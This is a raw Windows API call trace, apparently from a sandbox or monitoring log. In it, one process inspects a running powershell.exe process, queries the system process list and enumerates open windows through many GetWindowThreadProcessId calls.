	[0443.150] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xab0) returned 0x2d4
	[0443.356] EnumProcessModules (in: hProcess=0x2d4, lphModule=0x2cfabb8, cb=0x200, lpcbNeeded=0x24db68 | out: lphModule=0x2cfabb8, lpcbNeeded=0x24db68) returned 1
	[0443.358] GetModuleInformation (in: hProcess=0x2d4, hModule=0x13f370000, lpmodinfo=0x2cfae28, cb=0x18 | out: lpmodinfo=0x2cfae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0443.359] CoTaskMemAlloc (cb=0x804) returned 0x467a10
	[0443.359] GetModuleBaseNameW (in: hProcess=0x2d4, hModule=0x13f370000, lpBaseName=0x467a10, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0443.359] CoTaskMemFree (pv=0x467a10) 
	[0443.360] CoTaskMemAlloc (cb=0x804) returned 0x467a10
	[0443.360] GetModuleFileNameExW (in: hProcess=0x2d4, hModule=0x13f370000, lpFilename=0x467a10, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0443.360] CoTaskMemFree (pv=0x467a10) 
	[0443.361] CloseHandle (hObject=0x2d4) returned 1
	[0443.369] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xab0) returned 0x2d4
	[0443.370] GetExitCodeProcess (in: hProcess=0x2d4, lpExitCode=0x24dc98 | out: lpExitCode=0x24dc98*=0x103) returned 1
	[0443.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cfb088, Length=0x20000, ResultLength=0x24dc60 | out: SystemInformation=0x12cfb088, ResultLength=0x24dc60*=0x29928) returned 0xc0000004
	[0443.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d1b0b8, Length=0x2c128, ResultLength=0x24dc60 | out: SystemInformation=0x12d1b0b8, ResultLength=0x24dc60*=0x29928) returned 0x0
	[0443.502] EnumWindows (lpEnumFunc=0x2ba66ac, lParam=0x0) returned 1
	[0444.344] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0444.387] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x558
	[0444.389] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0444.392] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0444.397] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0444.399] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x538
	[0444.404] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0444.448] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x778
	[0444.588] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x778
	[0444.762] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0444.947] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0445.149] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0445.321] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0445.439] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0445.567] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0445.665] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0445.774] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0445.869] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x460
	[0446.090] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0446.233] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0446.382] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1520
	[0446.492] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x14bc
	[0446.691] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xf8c
	[0446.897] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe9c
	[0447.057] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1434
	[0447.058] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x14ec
	[0447.058] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xfcc
	[0447.058] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x12ac
	[0447.058] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1484
	[0447.058] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x934
	[0447.058] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xc0c
	[0447.059] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb08
	[0447.059] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x948
	[0447.059] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1178
	[0447.059] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x13e0
	[0447.059] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xcd0
	[0447.059] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x13fc
	[0447.059] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xdc8
	[0447.059] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xc18
	[0447.059] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xc2c
	[0447.059] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xa1c
	[0447.059] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1244
	[0447.060] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xdb0
	[0447.060] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1398
	[0447.060] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1358
	[0447.060] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1370
	[0447.060] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1340
	[0447.060] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x130c
	[0447.060] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x12c0
	[0447.060] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x12e4
	[0447.060] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1270
	[0447.060] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1298
	[0447.061] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x120c
	[0447.061] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x122c
	[0447.062] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x11c4
	[0447.062] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x11b0
	[0447.062] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1188
	[0447.062] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1148
	[0447.062] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1160
	[0447.062] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x10fc
	[0447.062] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe34
	[0447.062] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xea4
	[0447.062] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x514
	[0447.062] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe48
	[0447.063] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xbc8
	[0447.063] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xdf8
	[0447.063] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x318
	[0447.063] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xcac
	[0447.063] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x8bc
	[0447.063] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xf9c
	[0447.063] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xf48
	[0447.063] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe40
	[0447.063] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xecc
	[0447.063] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xeb8
	[0447.063] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe80
	[0447.064] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe98
	[0447.064] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe60
	[0447.064] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xee4
	[0447.064] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xf00
	[0447.064] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xdf0
	[0447.064] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xe1c
	[0447.064] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xdd0
	[0447.064] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xd94
	[0447.064] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xd74
	[0447.064] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xd00
	[0447.064] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xcd8
	[0447.065] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xc84
	[0447.065] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xca4
	[0447.065] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xc64
	[0447.065] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xc24
	[0447.065] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb84
	[0447.065] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xbac
	[0447.065] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x384
	[0447.065] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xab8
	[0447.065] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x33c
	[0447.065] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xa44
	[0447.066] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xa64
	[0447.066] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x8a8
	[0447.066] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xaf0
	[0447.066] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x88c
	[0447.066] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb04
	[0447.066] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x910
	[0447.066] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x230
	[0447.067] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xac0
	[0447.067] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xab4
	[0447.067] GetWindow (hWnd=0x2029a, uCmd=0x4) returned 0x0
	[0447.068] IsWindowVisible (hWnd=0x2029a) returned 0
	[0447.068] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xaac
	[0447.068] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x3d0
	[0447.069] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x978
	[0447.069] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xa7c
	[0447.069] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x59c
	[0447.069] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xa88
	[0447.069] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xa6c
	[0447.069] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xa68
	[0447.069] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x9f8
	[0447.069] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xa04
	[0447.070] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x924
	[0447.070] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x8dc
	[0447.070] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x7dc
	[0447.070] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x768
	[0447.070] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x764
	[0447.070] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x820
	[0447.070] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x810
	[0447.071] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x794
	[0447.071] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x83c
	[0447.071] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x7ac
	[0447.071] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb44
	[0447.071] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb5c
	[0447.071] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x838
	[0447.071] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.071] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.071] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.071] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.071] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.072] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.072] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.072] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.072] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x818
	[0447.072] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x5b8
	[0447.072] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x494
	[0447.072] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x1ec
	[0447.072] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x440
	[0447.072] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x7e8
	[0447.072] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x730
	[0447.072] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x2c8
	[0447.073] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x31c
	[0447.073] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x330
	[0447.073] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x128
	[0447.073] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x5c8
	[0447.073] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x6f8
	[0447.073] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x358
	[0447.073] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x73c
	[0447.073] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0xb0
	[0447.073] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x250
	[0447.073] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x240
	[0447.074] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x790
	[0447.074] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x61c
	[0447.074] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x540
	[0447.074] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x538
	[0447.074] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x568
	[0447.074] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x538
	[0447.074] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x568
	[0447.074] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x538
	[0447.074] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x540
	[0447.074] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x540
	[0447.074] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x57c
	[0447.075] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x460
	[0447.075] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x554
	[0447.075] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.075] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x528
	[0447.075] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.076] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.076] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.076] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x79c
	[0447.076] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.076] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4e0
	[0447.076] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x4d0
	[0447.076] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x24d9c0 | out: lpdwProcessId=0x24d9c0) returned 0x460
